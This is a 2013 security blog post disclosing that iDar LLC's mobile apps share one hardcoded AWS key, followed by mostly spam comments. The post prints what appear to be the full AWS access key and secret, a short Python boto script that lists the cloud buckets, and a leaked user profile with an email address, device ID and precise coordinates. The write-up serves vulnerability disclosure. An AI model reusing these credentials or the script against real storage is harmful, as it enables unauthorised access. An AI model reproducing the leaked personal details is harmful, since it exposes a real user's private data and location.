Wednesday, 27 November 2013

How you should NEVER design your App. Part 1

After analisys of  thousands of applications (you can read about it here), we've drilled into a few cases manually. In the result, we found a group of vulnerabilities in designs, which, I think, should be revealed in details.

Why design's flaws? Often it can't be located with automated tools and can't be fixed with a simple patch - you have to redesigne the logic of your app. So, the cost of fix can become quite high. Today we will talk about a shared storage authentication.

Many apps (especially from "social networking" section) processes user's private data such as contacts, photos, geolocation by downloading it into cloud from devices. How does authentication and authorisation work here?

How I would like to see it

  1. Every user has his or her own auth-secret and private storage.
  2. Authentication and data goes through a secured channel (SSL socket, as an example)
all other is just a consequence of these two.

How does it actually work in some apps?

iDar LLC Products is a good example here. They have released 5 apps. 3 of them are free:


A few security-related words from vendor :



requested permissions:




Having applied http://hackapp.com :



AWS-secret - it's a prefix for access-tokens for Amazon cloud storage. Yes, Cloud  authentication secret is hardcoded in the app and shared between all installations. What's in the storage? By using this small python function we are enumirating buckets:

import boto
import boto.s3.connection
hook_conn = boto.connect_s3(aws_access_key_id = 'AKIAIBKQCDT68HKP66SQ',aws_secret_access_key = 'UpJrv49dOQEahn7/NmHK71mCqrMvqyAp569DrTSh')
for bucket in hook_conn.get_all_buckets():
        print "{name}\t{created}".format(name = bucket.name,created = bucket.creation_date)
keys = []
for key in bucket.list():
keys.append(key.name)
print "Files: ",len(keys)
Result:

dev_pub Files:  580
idarpub Files:  11
idd_prv Files:  190989
idd_pub Files:  1288
ide_pub Files:  72558
idf_pub Files:  0
idg_pub Files:  3136
idgpub Files:  4
idh_pub Files:  2900


Hmm...  .xml files in ide_pub. What's inside?

<person>
<deviceId>C5E0E4E1-9446-43D6-BE0C-368C8CEE1C1B-2061-00000122386F8407</deviceId>
<name>Vincentamaria215</name>
<isCompany>0</isCompany>
<isMale>1</isMale>
<age>0</age>
<seesMales>0</seesMales>
<seesFemales>1</seesFemales>
<theirOpinion></theirOpinion>
<myOpinion></myOpinion>
<myHearts>0</myHearts>
<theirHearts>0</theirHearts>
<latitude>39.919891</latitude>
<longitude>-75.173438</longitude>
<accuracy>0.000000</accuracy>
<lastInfoChange>373974150.028001</lastInfoChange>
<lastMoodChange>0.000000</lastMoodChange>
<lastPhotoChange>373974386.849133</lastPhotoChange>
<myContactXml>&lt;vcard format="vcarddav"&gt;&lt;n&gt;&lt;given&gt;&lt;text&gt;Vincentamaria215&lt;/text&gt;&lt;/given&gt;&lt;/n&gt;&lt;group name="work"&gt;&lt;/group&gt;&lt;group name="home"&gt;&lt;email&gt;&lt;text&gt;oldlimp@gmail.com&lt;/text&gt;&lt;/email&gt;&lt;/group&gt;&lt;group name="other"&gt;&lt;/group&gt;&lt;photo&gt;&lt;photofilename&gt;&lt;text&gt;yef66433b4cff0e2a385679807777df3e8a4b4967z74f3.jpeg&lt;/text&gt;&lt;/photofilename&gt;&lt;/photo&gt;&lt;/vcard&gt;</myContactXml>
</person>

Wow, it seems to be private profiles of the app users, with geolocations... Let's try Google Earth to represent the locations ...


Sweeer! But let's also take a look into other bukets, what's happening in, for example, idd_prv with 190989 files?



If it looks and feels like private photos, it seems to be private photos...


Moral of  the story

Cloud storage was compromised with all user's data in it by a stupid design flaw. So, we don't need to invent any malware with 0-day exploits to obtain user data while we have such apps in App Store.

P.S.



Remember these guys. They are iDar's developers, who have ignored my reports for a few weeks. 

41 comments:

  1. Replies
    1. I just have to say thank you for this return to your original focus. I love it. And thanks for identifying which recipes are really good, etc. This is information that is very useful. دانلود آهنگ شاد

      Delete
  2. Get lots of security thematically close articles at this page

    ReplyDelete
    Replies
    1. Great Article
      android based projects





      Java Training in Chennai

      Project Center in Chennai

      Java Training in Chennai

      projects for cse



      The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training Project Centers in Chennai

      Delete
  3. Very helpful suggestions that help in the optimizing website.
    thank for sharing the link.
    goldenslot
    สูตรบาคาร่า

    ReplyDelete
  4. i really like this article please keep it up. Mobile App Developers

    ReplyDelete
  5. This is Very very nice article. Everyone should read. Thanks for sharing and I found it very helpful. Don't miss WORLD'S BEST CarGames

    ReplyDelete
  6. The Collection Marts is platform where you can view latest designs about home décor and bedding. We have large range in different categories with finest fabric in cotton and silk. You can view not only present trends but also view huge collection with reasonable price. pretty bed sheets , bed quilt cover , sateen sheet set , alkaram bridal bed sheets , slumberdown duvet , vicky razai price , green sofa cover , velvet comforter , single razai cover The Collection Marts can provide fast service about delivery as well as customer support too. Our products are not only self-made but also, well connected with markets to ensure for possibility of available designs if client want to purchase. The Collection Marts customer support open 24/7 to guide their customers about material or product stuff.

    ReplyDelete
  7. This comment has been removed by the author.

    ReplyDelete
  8. Faisalabad is one of the biggest cities in Pakistan and the hub of the textile industry. It is widely acknowledged as the Manchester of Pakistan due to its large industrial role. The quality of the fabrics produced in this city has no parallel. In fact, the fabric is something of a specialty of Faisalabad. Many people from all over the country flock to this city for a spot of cloth shopping. We aim to provide you all of the best of Faisalabad at our store. branded lawn 2016 , gul ahmed lawn with price

    ReplyDelete
  9. Great insights. I look forward to reading what 're planning on next, because your post is a nice read.
    check here

    ReplyDelete
  10. I've been looking for photos and articles on this topic over the past few days due to a school assignment, 파워볼사이트 and I'm really happy to find a post with the material I was looking for! I bookmark and will come often! Thanks :D

    ReplyDelete
  11. Are you searching for the newest and latest Pakistani Designer lawn collection you have come to the right place to buy the stitched latest lawn Suits 2022 in sale Price? Pakistan lawn Collection 2022 is not only famous within the country, but in foreign countries as well.

    ReplyDelete
  12. Your blog is really nice. Its sound really good
    바카라사이트

    ReplyDelete
  13. Appreciate it for this post, I am a big fan of this internet site would like to keep updated. 스포츠토토

    ReplyDelete
  14. Very nice article, just what I wanted to find. 경마

    ReplyDelete
  15. Excellent write-up. I absolutely appreciate this website. 릴게임

    ReplyDelete
  16. Your article looks really adorable, here’s a site link i dropped for you which you may like. 토토사이트

    ReplyDelete
  17. Employing a .NET designer seaward is a superb method for finding your best match abroad. Like a customary technique for employing, you are expected to examine engineers' resumes to see as the one. Notwithstanding the way that rethinking seller does all the daily practice with employing, it might work out great for you to know about the accompanying angles to ensure they will enlist you the perfect individual. On the off chance that you choose to enlist a lesser .NET designer rethink subject matter expert, it is significant that they will have a guide to oversee their activities and assist them with developing expertly. Having a guide will likewise be useful as far as getting another individual from the group to oblige quicker. When a .NET designer far off expert is profoundly intrigued to give the most ideal outcome the venture improvement interaction will go all the more easily and impressively quicker>> hire net developer

    ReplyDelete